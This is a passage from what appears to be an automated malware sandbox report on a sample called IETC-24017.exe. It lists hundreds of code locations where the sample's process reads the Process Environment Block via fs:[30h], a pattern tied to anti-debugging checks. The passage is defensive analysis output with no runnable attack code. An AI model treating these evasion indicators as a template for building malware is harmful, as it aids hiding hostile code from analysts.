                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A2000 mov eax, dword ptr fs:[00000030h]3_2_018A2000
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC0F0 mov eax, dword ptr fs:[00000030h]3_2_017FC0F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E016 mov eax, dword ptr fs:[00000030h]3_2_0181E016
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA0E3 mov ecx, dword ptr fs:[00000030h]3_2_017FA0E3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896030 mov eax, dword ptr fs:[00000030h]3_2_01896030
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802050 mov eax, dword ptr fs:[00000030h]3_2_01802050
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886050 mov eax, dword ptr fs:[00000030h]3_2_01886050
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182C073 mov eax, dword ptr fs:[00000030h]3_2_0182C073
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182438F mov eax, dword ptr fs:[00000030h]3_2_0182438F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182438F mov eax, dword ptr fs:[00000030h]3_2_0182438F
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A3C0 mov eax, dword ptr fs:[00000030h]3_2_0180A3C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018083C0 mov eax, dword ptr fs:[00000030h]3_2_018083C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BC3CD mov eax, dword ptr fs:[00000030h]3_2_018BC3CD
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018863C0 mov eax, dword ptr fs:[00000030h]3_2_018863C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov ecx, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018AE3DB mov eax, dword ptr fs:[00000030h]3_2_018AE3DB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A43D4 mov eax, dword ptr fs:[00000030h]3_2_018A43D4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A43D4 mov eax, dword ptr fs:[00000030h]3_2_018A43D4
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018103E9 mov eax, dword ptr fs:[00000030h]3_2_018103E9
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC310 mov ecx, dword ptr fs:[00000030h]3_2_017FC310
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0181E3F0 mov eax, dword ptr fs:[00000030h]3_2_0181E3F0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018363FF mov eax, dword ptr fs:[00000030h]3_2_018363FF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A30B mov eax, dword ptr fs:[00000030h]3_2_0183A30B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01820310 mov ecx, dword ptr fs:[00000030h]3_2_01820310
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01882349 mov eax, dword ptr fs:[00000030h]3_2_01882349
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov ecx, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188035C mov eax, dword ptr fs:[00000030h]3_2_0188035C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A8350 mov ecx, dword ptr fs:[00000030h]3_2_018A8350
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018CA352 mov eax, dword ptr fs:[00000030h]3_2_018CA352
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F8397 mov eax, dword ptr fs:[00000030h]3_2_017F8397
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A437C mov eax, dword ptr fs:[00000030h]3_2_018A437C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE388 mov eax, dword ptr fs:[00000030h]3_2_017FE388
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E284 mov eax, dword ptr fs:[00000030h]3_2_0183E284
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E284 mov eax, dword ptr fs:[00000030h]3_2_0183E284
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01880283 mov eax, dword ptr fs:[00000030h]3_2_01880283
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F826B mov eax, dword ptr fs:[00000030h]3_2_017F826B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102A0 mov eax, dword ptr fs:[00000030h]3_2_018102A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102A0 mov eax, dword ptr fs:[00000030h]3_2_018102A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov ecx, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018962A0 mov eax, dword ptr fs:[00000030h]3_2_018962A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FA250 mov eax, dword ptr fs:[00000030h]3_2_017FA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180A2C3 mov eax, dword ptr fs:[00000030h]3_2_0180A2C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F823B mov eax, dword ptr fs:[00000030h]3_2_017F823B
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018102E1 mov eax, dword ptr fs:[00000030h]3_2_018102E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01888243 mov eax, dword ptr fs:[00000030h]3_2_01888243
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01888243 mov ecx, dword ptr fs:[00000030h]3_2_01888243
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01806259 mov eax, dword ptr fs:[00000030h]3_2_01806259
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA250 mov eax, dword ptr fs:[00000030h]3_2_018BA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA250 mov eax, dword ptr fs:[00000030h]3_2_018BA250
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01804260 mov eax, dword ptr fs:[00000030h]3_2_01804260
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B0274 mov eax, dword ptr fs:[00000030h]3_2_018B0274
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802582 mov eax, dword ptr fs:[00000030h]3_2_01802582
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01802582 mov ecx, dword ptr fs:[00000030h]3_2_01802582
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01834588 mov eax, dword ptr fs:[00000030h]3_2_01834588
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E59C mov eax, dword ptr fs:[00000030h]3_2_0183E59C
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018805A7 mov eax, dword ptr fs:[00000030h]3_2_018805A7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018245B1 mov eax, dword ptr fs:[00000030h]3_2_018245B1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018245B1 mov eax, dword ptr fs:[00000030h]3_2_018245B1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E5CF mov eax, dword ptr fs:[00000030h]3_2_0183E5CF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E5CF mov eax, dword ptr fs:[00000030h]3_2_0183E5CF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018065D0 mov eax, dword ptr fs:[00000030h]3_2_018065D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A5D0 mov eax, dword ptr fs:[00000030h]3_2_0183A5D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183A5D0 mov eax, dword ptr fs:[00000030h]3_2_0183A5D0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018025E0 mov eax, dword ptr fs:[00000030h]3_2_018025E0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E5E7 mov eax, dword ptr fs:[00000030h]3_2_0182E5E7
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C5ED mov eax, dword ptr fs:[00000030h]3_2_0183C5ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183C5ED mov eax, dword ptr fs:[00000030h]3_2_0183C5ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01896500 mov eax, dword ptr fs:[00000030h]3_2_01896500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018D4500 mov eax, dword ptr fs:[00000030h]3_2_018D4500
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01810535 mov eax, dword ptr fs:[00000030h]3_2_01810535
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182E53E mov eax, dword ptr fs:[00000030h]3_2_0182E53E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808550 mov eax, dword ptr fs:[00000030h]3_2_01808550
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01808550 mov eax, dword ptr fs:[00000030h]3_2_01808550
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183656A mov eax, dword ptr fs:[00000030h]3_2_0183656A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA49A mov eax, dword ptr fs:[00000030h]3_2_018BA49A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017F645D mov eax, dword ptr fs:[00000030h]3_2_017F645D
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018064AB mov eax, dword ptr fs:[00000030h]3_2_018064AB
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018344B0 mov ecx, dword ptr fs:[00000030h]3_2_018344B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188A4B0 mov eax, dword ptr fs:[00000030h]3_2_0188A4B0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FC427 mov eax, dword ptr fs:[00000030h]3_2_017FC427
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE420 mov eax, dword ptr fs:[00000030h]3_2_017FE420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE420 mov eax, dword ptr fs:[00000030h]3_2_017FE420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_017FE420 mov eax, dword ptr fs:[00000030h]3_2_017FE420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018004E5 mov ecx, dword ptr fs:[00000030h]3_2_018004E5
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01838402 mov eax, dword ptr fs:[00000030h]3_2_01838402
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01838402 mov eax, dword ptr fs:[00000030h]3_2_01838402
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01838402 mov eax, dword ptr fs:[00000030h]3_2_01838402
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_01886420 mov eax, dword ptr fs:[00000030h]3_2_01886420
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0183E443 mov eax, dword ptr fs:[00000030h]3_2_0183E443
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182245A mov eax, dword ptr fs:[00000030h]3_2_0182245A
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018BA456 mov eax, dword ptr fs:[00000030h]3_2_018BA456
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188C460 mov ecx, dword ptr fs:[00000030h]3_2_0188C460
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182A470 mov eax, dword ptr fs:[00000030h]3_2_0182A470
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182A470 mov eax, dword ptr fs:[00000030h]3_2_0182A470
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0182A470 mov eax, dword ptr fs:[00000030h]3_2_0182A470
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018A678E mov eax, dword ptr fs:[00000030h]3_2_018A678E
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018B47A0 mov eax, dword ptr fs:[00000030h]3_2_018B47A0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018007AF mov eax, dword ptr fs:[00000030h]3_2_018007AF
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0180C7C0 mov eax, dword ptr fs:[00000030h]3_2_0180C7C0
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018807C3 mov eax, dword ptr fs:[00000030h]3_2_018807C3
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_0188E7E1 mov eax, dword ptr fs:[00000030h]3_2_0188E7E1
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018227ED mov eax, dword ptr fs:[00000030h]3_2_018227ED
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: 3_2_018227ED mov eax, dword ptr fs:[00000030h]3_2_018227ED
